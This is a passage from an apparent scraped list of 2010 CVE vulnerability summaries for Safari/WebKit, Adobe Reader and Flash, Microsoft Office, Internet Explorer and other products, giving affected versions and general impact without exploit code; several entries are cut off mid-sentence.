web site. [CVE-2010-3821] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the :first-letter pseudo-element in a Cascading Style Sheets (CSS) token sequence, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. [CVE-2010-3820] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, accesses uninitialized memory during processing of editable elements, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3819] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) boxes, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3818] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving inline text boxes. [CVE-2010-3817] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of Cascading Style Sheets (CSS) 3D transforms, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3816] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving scrollbars. [CVE-2010-3813] The WebCore::HTMLLinkElement::process function in WebCore/html/HTMLLinkElement.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3812] Integer overflow in the Text::wholeText method in dom/Text.cpp in WebKit, as used in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4 [CVE-2010-3811] Use-after-free vulnerability in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving element attributes. [CVE-2010-3810] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly handle the History object, which allows remote attackers to spoof the location bar's URL or add URLs to the history via a cross-origin attack. [CVE-2010-3809] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of inline styling, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3808] WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, does not properly perform a cast of an unspecified variable during processing of editing commands, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted web site. [CVE-2010-3805] Integer underflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving WebSockets. NOTE: this may overlap CVE-2010-3254. [CVE-2010-3804] The JavaScript implementation in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, uses a weak algorithm for generating values of random numbers, which makes it easier for remote attackers to track a user by predicting a value, a related issue to CVE-2008-5913 and CVE-2010-3171. [CVE-2010-3803] Integer overflow in WebKit in Apple Safari before 5.0.3 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.3 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted string. [CVE-2010-3785] Buffer overflow in QuickLook in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Office document. [CVE-2010-3769] The line-breaking implementation in Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 on Windows does not properly handle long strings, which allows remote attackers to execute arbitrary code via a crafted document.write call that triggers a buffer over-read. [CVE-2010-3734] The Install component in IBM DB2 UDB 9.5 before FP6a on Linux, UNIX, and Windows enforces an unintended limit on password length, which makes it easier for attackers to obtain access via a brute-force attack. [CVE-2010-3732] The DRDA Services component in IBM DB2 UDB 9.5 before FP6a allows remote authenticated users to cause a denial of service (database server ABEND) by using the client CLI on Linux, UNIX, or Windows for executing a prepared statement with a large number of parameter markers. [CVE-2010-3658] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3632. [CVE-2010-3657] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3656. [CVE-2010-3656] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3657. [CVE-2010-3654] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010. [CVE-2010-3652] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3650. [CVE-2010-3650] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3652. [CVE-2010-3649] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3648] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3647] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3646] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3645] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3644] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3643] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3642] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3641] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3640] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3639] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-3637] An unspecified ActiveX control in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 (Flash10h.ocx) on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted FLV video. [CVE-2010-3636] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors. [CVE-2010-3632] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3658. [CVE-2010-3630] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-3629] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3620. [CVE-2010-3628] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3627] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via unknown vectors. [CVE-2010-3626] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-2889. [CVE-2010-3625] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a "prefix protocol handler vulnerability." [CVE-2010-3622] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3621] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3620] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3629. [CVE-2010-3619] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3535] Unspecified vulnerability in the Directory Server Enterprise Edition component in Oracle Sun Products Suite 6.0, 6.1, 6.2, and 6.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Identity Synchronization for Windows. [CVE-2010-3499] F-Secure Anti-Virus does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. NOTE: the researcher indicates that a vendor response was received, stating that "the inability to catch these files are caused by lacking functionality rather than programming errors." [CVE-2010-3498] AVG Anti-Virus does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. [CVE-2010-3497] Symantec Norton AntiVirus 2011 does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. NOTE: the researcher indicates that a vendor response was received, stating that this issue "falls into the work of our Firewall and not our AV (per our methodology of layers of defense)." [CVE-2010-3496] McAfee VirusScan Enterprise 8.5i and 8.7i does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. [CVE-2010-3487] Directory traversal vulnerability in YelloSoft Pinky 1.0 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL. [CVE-2010-3460] Directory traversal vulnerability in the HTTP interface in AXIGEN Mail Server 7.4.1 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL. [CVE-2010-3454] Multiple off-by-one errors in the WW8DopTypography::ReadFromMem function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted typography information in a Microsoft Word .DOC file that triggers an out-of-bounds write. [CVE-2010-3453] The WW8ListManager::WW8ListManager function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 does not properly handle an unspecified number of list levels in user-defined list styles in WW8 data in a Microsoft Word document, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .DOC file that triggers an out-of-bounds write. [CVE-2010-3348] Microsoft Internet Explorer 6, 7, and 8 does not prevent rendering of cached content as HTML, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Cross-Domain Information Disclosure Vulnerability," a different vulnerability than CVE-2010-3342. [CVE-2010-3346] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-3345] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-3343] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-3342] Microsoft Internet Explorer 6, 7, and 8 does not prevent rendering of cached content as HTML, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Cross-Domain Information Disclosure Vulnerability," a different vulnerability than CVE-2010-3348. [CVE-2010-3340] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-3337] Untrusted search path vulnerability in Microsoft Office 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Insecure Library Loading Vulnerability." NOTE: this might overlap CVE-2010-3141 and CVE-2010-3142. [CVE-2010-3336] Microsoft Office XP SP3, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "MSO Large SPID Read AV Vulnerability." [CVE-2010-3335] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "Drawing Exception Handling Vulnerability." [CVE-2010-3334] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via an Office document containing an Office Art Drawing record with crafted msofbtSp records and unspecified flags, which triggers memory corruption, aka "Office Art Drawing Records Vulnerability." [CVE-2010-3333] Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability." [CVE-2010-3332] Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability." [CVE-2010-3331] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory in certain circumstances involving use of Microsoft Word to read Word documents, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3330] Microsoft Internet Explorer 6 through 8 does not properly restrict script access to content from a different (1) domain or (2) zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2010-3329] mshtmled.dll in Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code via a crafted Microsoft Office document that causes the HtmlDlgHelper class destructor to access uninitialized memory, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3328] Use-after-free vulnerability in the CAttrArray::PrivateFind function in mshtml.dll in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code by setting an unspecified property of a stylesheet object, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3327] The implementation of HTML content creation in Microsoft Internet Explorer 6 through 8 does not remove the Anchor element during pasting and editing, which might allow remote attackers to obtain sensitive deleted information by visiting a web page, aka "Anchor Element Information Disclosure Vulnerability." [CVE-2010-3326] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3325] Microsoft Internet Explorer 6 through 8 does not properly handle unspecified special characters in Cascading Style Sheets (CSS) documents, which allows remote attackers to obtain sensitive information from a different (1) domain or (2) zone via a crafted web site, aka "CSS Special Character Information Disclosure Vulnerability." [CVE-2010-3268] The GetStringAMSHandler function in prgxhndl.dll in hndlrsvc.exe in the Intel Alert Handler service (aka Symantec Intel Handler service) in Intel Alert Management System (AMS), as used in Symantec Antivirus Corporate Edition 10.1.4.4010 on Windows 2000 SP4 and Symantec Endpoint Protection before 11.x, does not properly validate the CommandLine field of an AMS request, which allows remote attackers to cause a denial of service (application crash) via a crafted request. [CVE-2010-3242] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Ghost Record Type Parsing Vulnerability." [CVE-2010-3241] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out-of-Bounds Memory Write in Parsing Vulnerability." [CVE-2010-3240] Microsoft Excel 2002 SP3 and 2007 SP2 [CVE-2010-3239] Microsoft Excel 2002 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Extra Out of Boundary Record Parsing Vulnerability." [CVE-2010-3238] Microsoft Excel 2002 SP3 and 2003 SP3, and Office 2004 for Mac, does not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Negative Future Function Vulnerability." [CVE-2010-3237] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Merge Cell Record Pointer Vulnerability." [CVE-2010-3236] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out Of Bounds Array Vulnerability." [CVE-2010-3235] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Biff Record Vulnerability." [CVE-2010-3234] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Substream Memory Corruption Vulnerability." [CVE-2010-3233] Microsoft Excel 2002 SP3 and 2003 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted .wk3 (aka Lotus 1-2-3 workbook) file, aka "Lotus 1-2-3 Workbook Parsing Vulnerability." [CVE-2010-3232] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2010-3231] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Excel Record Parsing Memory Corruption Vulnerability." [CVE-2010-3230] Integer overflow in Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel document with crafted record information, aka "Excel Record Parsing Integer Overflow Vulnerability." [CVE-2010-3228] The JIT compiler in Microsoft .NET Framework 4.0 on 64-bit platforms does not properly perform optimizations, which allows remote attackers to execute arbitrary code via a crafted .NET application that triggers memory corruption, aka ".NET Framework x64 JIT Compiler Vulnerability." [CVE-2010-3221] Microsoft Word 2002 SP3 and 2003 SP3, Office 2004 for Mac, and Word Viewer do not properly handle a malformed record during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3220] Unspecified vulnerability in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3219] Array index vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Parsing Vulnerability." [CVE-2010-3218] Heap-based buffer overflow in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via malformed records in a Word document, aka "Word Heap Overflow Vulnerability." [CVE-2010-3217] Double free vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a Word document with crafted List Format Override (LFO) records, aka "Word Pointer Vulnerability." [CVE-2010-3216] Microsoft Word 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a crafted Word document containing bookmarks that trigger use of an invalid pointer and memory corruption, aka "Word Bookmarks Vulnerability." [CVE-2010-3215] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle unspecified return values during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Return Value Vulnerability." [CVE-2010-3214] Stack-based buffer overflow in Microsoft Word 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2010-3213] Cross-site request forgery (CSRF) vulnerability in Microsoft Outlook Web Access (owa/ev.owa) 2007 through SP2 allows remote attackers to hijack the authentication of e-mail users for requests that perform Outlook requests, as demonstrated by setting the auto-forward rule. [CVE-2010-3200] MSO.dll in Microsoft Word 2003 SP3 11.8326.11.8324 allows remote attackers to cause a denial of service (NULL pointer dereference and multiple-instance application crash) via a crafted buffer in a Word document, as demonstrated by word_crash_11.8326.8324_poc.doc. [CVE-2010-3195] Unspecified vulnerability in IBM DB2 9.1 before FP9, 9.5 before FP6, and 9.7 before FP2 on Windows Server 2008 allows attackers to cause a denial of service (trap) via vectors involving "special group and user enumeration." [CVE-2010-3190] Untrusted search path vulnerability in the Microsoft Foundation Class (MFC) Library in Microsoft Visual Studio .NET 2003 SP1 [CVE-2010-3181] Untrusted search path vulnerability in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2010-3157] Untrusted search path vulnerability in XacRett before 50 allows attackers to execute arbitrary code via a Trojan horse executable file, related to the explorer.exe filename and use of Windows Explorer. [CVE-2010-3148] Untrusted search path vulnerability in Microsoft Visio 2003 SP3 allows local users to gain privileges via a Trojan horse mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .vsd, .vdx, .vst, or .vtx file, aka "Microsoft Visio Insecure Library Loading Vulnerability." [CVE-2010-3146] Multiple untrusted search path vulnerabilities in Microsoft Groove 2007 SP2 allow local users to gain privileges via a Trojan horse (1) mso.dll or (2) GroovePerfmon.dll file in the current working directory, as demonstrated by a directory that contains a Groove vCard (.vcg) or Groove Tool Archive (.gta) file, aka "Microsoft Groove Insecure Library Loading Vulnerability." [CVE-2010-3142] Untrusted search path vulnerability in Microsoft Office PowerPoint 2007 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse rpawinet.dll that is located in the same folder as a .odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx file. [CVE-2010-3141] Untrusted search path vulnerability in Microsoft PowerPoint 2010 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse pptimpconv.dll that is located in the same folder as a .odp, .pot, .potm, .potx, .ppa, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, 